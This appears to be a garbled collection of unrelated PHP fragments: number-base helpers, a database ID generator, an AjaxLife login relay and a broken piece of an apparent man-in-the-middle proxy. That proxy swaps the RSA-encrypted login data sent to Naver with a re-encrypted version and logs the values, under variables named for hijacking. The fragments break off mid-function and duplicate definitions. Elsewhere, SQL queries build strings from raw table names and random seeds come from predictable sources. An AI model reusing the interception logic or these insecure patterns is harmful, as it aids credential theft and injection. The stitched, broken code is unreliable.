function base2base($in, $inchars, $outchars)
{
$inbase = strlen($inchars);
$outbase = strlen($outchars);
$inlen = strlen($in);
$out = '0';
for ($i = 0; $i < $inlen; $i++) {
$pos = strpos($inchars, $in[$i]);
$out = bcmul($out, $inbase, 0);
$out = bcadd($out, $pos, 0);
}
return dec2base($out, $outchars, $outbase);
}
function clipperz_randomSeed()
{
$result;
srand((double) microtime() * 1000000);
$result = "";
while (strlen($result) < 64) {
$result = $result . dec2base(rand(), 16);
}
$result = substr($result, 0, 64);
return $result;
}
/**
* Get a new SYSID from the id_table. You can get SYSID for a table with prefix and base converting
*
* @param \Zend_Db_Adapter_Abstract $conn database connection
* @param string $tableName table name
* @param boolean $includePrefix
* @param integer $base to encode
* @return string
**/
protected function getNewSYSID($conn, $tableName, $includePrefix = false, $base = -1)
{
$maxRetry = 10;
// try to update the table idbody column
for ($try = 1; $try <= $maxRetry; $try++) {
$sql = "SELECT * FROM ob_sysids WHERE TABLENAME='{$tableName}'";
try {
$rs = $conn->query($sql);
} catch (Exception $e) {
throw new Exception("Error in query: " . $sql . ". " . $e->getMessage());
return false;
}
$row = $rs->fetch();
unset($rs);
list($tblname, $prefix, $idbody) = $row;
if (!$row) {
throw new Exception("Error in generating new system id: '{$tableName}' is not in ob_sysids table.");
}
if ($row) {
if ($idbody == null && $prefix) {
// idbody is empty, return false
throw new Exception("Error in generating new system id: ob_sysids table does not have a valid sequence for '{$tableName}'.");
}
}
// try to update the table idbody column
$sql = "UPDATE ob_sysids SET IDBODY=IDBODY+1 WHERE TABLENAME='{$tableName}' AND IDBODY={$idbody}";
try {
$rs = $conn->query($sql);
} catch (Exception $e) {
throw new Exception("Error in query: " . $sql . ". " . $e->getMessage());
return false;
}
if ($rs->rowCount() > 0) {
$idbody += 1;
break;
}
}
if ($try <= $maxRetry) {
if ($base >= 2 && $base <= 36) {
$idbody = dec2base($idbody, $base);
}
if ($includePrefix) {
return $prefix . "_" . $idbody;
}
return $idbody;
} else {
throw new Exception("Error in generating new system id: unable to get a valid id.");
}
return false;
}
function bc2bin($num)
{
return dec2base($num, MAX_BASE);
}
<?php
define('AJAXLIFE_SERVER', 'http://ajaxlife.net:8080');
header("Content-Type: application/json");
require_once 'RSA.php';
$details = @file_get_contents(AJAXLIFE_SERVER . '/api/newsession');
if ($details === false) {
die(json_encode(array('success' => false, 'message' => 'Could not connect to AjaxLife server.')));
}
$details = json_decode($details);
$toencrypt = $details->Challenge . '\\' . base64_encode($_POST['first']) . '\\' . base64_encode($_POST['last']) . '\\' . $_POST['pass'] . '\\' . rand();
$encrypted = rsa_encrypt($toencrypt, base2dec($details->Exponent, 16), base2dec($details->Modulus, 16), 1024);
$encrypted = dec2base($encrypted, 16);
$curl = curl_init(AJAXLIFE_SERVER . '/api/login');
curl_setopt_array($curl, array(CURLOPT_RETURNTRANSFER => true, CURLOPT_HEADER => false, CURLOPT_POST => true));
$post = array('session' => $details->SessionID, 'logindata' => $encrypted, 'location' => 'last', 'grid' => $details->DefaultGrid, 'events' => 'FriendOnOffline,Disconnected,InstantMessage,SpatialChat');
$post = http_build_query($post, '_', '&');
curl_setopt($curl, CURLOPT_POSTFIELDS, $post);
$return = curl_exec($curl);
curl_close($curl);
$json = json_decode(trim($return));
if ($json->success) {
print json_encode(array('success' => true, 'next' => AJAXLIFE_SERVER . '/iphone.kat', 'sid' => $details->SessionID));
} else {
print $return;
}
$query = "SELECT * FROM naver_key ORDER BY key_id DESC LIMIT 1";
}
$naver_keys = $dbh->query($query);
foreach ($naver_keys as $row) {
}
$naver_key = $row;
// if ($naver_key == "") {
// die("no session key " . $session_key_org);
// }
$new_pub = $naver_key['rsa_key2'];
fwrite($fp, sprintf("new_pub = %s\n", $new_pub));
$new_pub2 = base2dec($new_pub, 16);
fwrite($fp, sprintf("new_pub2 = %s\n", $new_pub2));
$new_enc = rsa_encrypt($mitm_original, $modulus, $new_pub2, 808);
fwrite($fp, sprintf("new_enc = %s\n", $new_enc));
$new_enc_hexa = dec2base($new_enc, 16);
fwrite($fp, sprintf("new_enc_hexa = %s\n", $new_enc_hexa));
$content = str_replace($mitm_rsa, $new_enc_hexa, $content);
fwrite($fp, sprintf("content = %s\n", $content));
// if ($offline_mode == 1) die();
// encrypt with original id/pw
}
$r->setBody($content);
# $r->addPostFile('image', 'profile.jpg', 'image/jpeg');
$b = $r->send();
try {
# foreach ($b->getHeaders() as $hk => $kv) {
# header($hk.': ' .$kv);
# }
$body = $b->getBody();
if ($_SERVER['REQUEST_URI'] == '/authct/v1/keys/naver' and $hijacking_mode == 1) {
function bc2bin($num)
{
return dec2base($num, 128);
}
